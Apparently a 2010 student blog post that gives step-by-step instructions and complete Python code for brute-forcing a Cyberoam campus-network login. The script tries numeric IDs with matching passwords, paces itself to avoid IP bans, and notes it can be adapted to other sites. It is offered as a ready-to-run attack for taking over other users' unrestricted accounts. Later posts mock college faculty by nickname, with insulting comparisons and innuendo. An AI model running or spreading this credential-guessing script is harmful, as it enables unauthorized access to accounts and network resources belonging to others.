Sunday, January 31, 2010

CYBEROAM PROF ID's HACKING CODE

Lately I have been getting much amount of queries about  Prof ID's or IDs which have no limit on download or time restrictions. So I am giving out the code which I wrote to scan the IDs. Note that this code can be used to brute force any website (obviously without a captcha or image based identification system.) with some minor modifications and a good dictionary.



STEPS TO GET PROF ID's ( Ids with same numeric username and password)

1. Download Python IDE from http://www.python.org (not python.com !!!!). I have been using 2.5.1 and recommend the same.
2. Install normally
3. Open Notepad
4. Copy the following code in it or skip steps 2 n 3 n download the file from http://www.bitproxy.co.cc/data/cyberoam.py


-----------------COPY AFTER HERE----------------



# Cyberaom Prof IDs hacking code
# @author Abhishek Anand, BIT Mesra
# feel free to modify this code but do mail your code to:

codebase@bitproxy.co.cc

import urllib
import time

#this is the range of Ids to check
checkList = range(1,10000)

for i in checkList:
     userid =str(i)
     password= str(i)

     # here a post request is being made to the CyberoamHTTPClient servelet
     # for any other site view its form's source nd make a dictionary of

elements

     dataToSend = urllib.urlencode({'mode': '191','isAccessDenied': '', 'url':

'', 'username': userid, 'password': password, 'saveinfo': '',  })
     postRequest =

urllib.urlopen("http://172.16.1.1:8090/corporate/servlet/CyberoamHTTPClient",

dataToSend)
     responseData = postRequest.read()

     # reading the faltu string from the output to verify
     if not responseData.count('Make+sure+your+password+is+correct'):
          print userid
      # time to stop scanning before opening URL
          time.sleep(1)
          # here I m opening my Foxy's Updata File :P
          openURLToCheck =

urllib.urlopen("http://www.bitproxy.co.cc/data/file.txt")
          checkData = openURLToCheck.read()
          if checkData.count('2k8'):
               print '------------------------------------------'
               print ' ID FOUND !!!!!    ID FOUND !!!! ID FOUND!!!!'
               print '------------------------------------------'
               print password
    # stopping after 80 checks to prevent temporary IP banning by stupid

Cyberoam
     if i%80 == 0:
          print 'SCAN COMPLETED UPTO ' + str(i)
          time.sleep(3)


         
    
-----------------COPY UPTO HERE--------------------



5. Save the file with .py extension (e.g. hacker.py)
6. Now open the place where you have saved the file.
7. Right click on the file and select 'Edit with IDLE'
8. From the menu options run the program or press F5
9. The OUTPUT will generate both dead and working IDs.
10. ID FOUND !!! ID FOUND !!! means a working ID has been found.


**  You can implement the same thing in Java using Java.net.* libraries. but
it may take more lines of codes.
**  Please donot use this code on your friends IDs. :P

For any help feel free to mail me at:  opensource@bitproxy.co.cc

Abhishek Anand

Thursday, August 13, 2009

Wanna be a co-owner of this blog ????

If you want to contribute to this blog as a co-owner then just write to me at my mail address or just put a comment here in reply to this post mentioning your name and email address.

for Web and Spiderman

Wednesday, August 12, 2009

Dictators of BIT Mesra

Some names have been intentionally changed so as to hide the identity of victims and others.

We are just standing up for a cause.If we hurt anybody's feelings we are extremely sorry about that.We deeply respect the persons referred below.

Copyright Web and Spiderman, 2009


LIST OF DICTATORS (you can add your experiences as comments)

  • 'Laal Baal' alias Ajmal Kasab :
Identification mark - constantly shouts at students and teachers in hindi. Demoralizes students and gives alltogether wrong concepts for e.g. one day he told us about polymomial function being discontinuous at some points.
  • Mechanics Lab Incharge alias 'Budhau Sir'
Identification mark - suddh hindi ke saath kuch acche comments apke t-shirt aur jeans ke baare mein aur in case you are a girl then things which must not be mentioned here.
'Sampul calculation karna hai' is his tagline. You may wonder when will he retire.

budhau ki hawas ke shikar students:
1. 'MSTC wala ladka' and 'idhar aa.....accha chor' waala ladka -

inn massomo ko kya pata tha ki unke 2 classes ki mehnat pe paani phirne jaa raha hai. jaalim ne index page ko hi itni bedardi se kaata ki wo phatne ki kagaar pe aa gaya.

2. Mr. Bablu Werewolf -

ghor beijyatti .......'ye ladka bhondu hai, isse kuch nahi aata.......kya hostel ka khana kha ke motaa rahe ho sirf....' itna kehkar jaalim ne file phekkar uske muh pe maara par bachpan ka cricket kaam aaya nahi to aaj naak phut gaye hoti......... itna hone se pehle bablu bhag kyu nahi gaya....aur ek baat chamiya ki 'medamji' aur unki 'saheli' ne bablu ki sahayata karne ki koi koshish nahi ki...i feel truly sorry for bablu. lets pray for bablu.

3. Me

jaalim : 'andha ho gaya hai kya ji.......kya likha hai'
me : 'sir wo calculate karke direct answer likhe hai'
jaalim : 'pagal ho kya ji....kahi se chap ke likh loge aur kahoge ki calculator se kiye hai. ye kya likha hai...moment of inertia ka unit kya hota hai?'
me : 'kg m2'
jaalim :'kaise ji....tum log yeha par kaise aa gaye ho.....12 me kuch padhe


4. Neo <<>>
jaalim : 'jhandi-maar t-shirt pehen ke kyu aa jate ho'
ab batayiye t-shirt ka mechanics lab se kya sambandh......

5. Anonumous <<>>

jaalim : 'kitna gpa aaya hai ji'
anonymous : ' sir 8.35'
jaalim : 'samajh me nahi aata, kaise e log ko itna gpa aa jata hai


6. jaalim ka assistant
you must be thinking how can somebody work under jalim....par kya kare naukri hai...karni parti hai.....
our source overheard following piece of conversation between jaalim and the victim ---

jaalim : 'accha ek chij bataiye toh, e jo pankha hai,e beam me kahe latka hai...aur bhi to jagah hai idhar udhar..'
assistant : 'sir.......sir..........sir'
jaalim : 'sochiye sochiye'
jaalim : 'beam mota hota hai,isiliye pakar majboot hota hai......he he he...e sab purana jamana ka baat hai...aaj kal ke log ko e sab thore hi pataa'


( to be continued.............)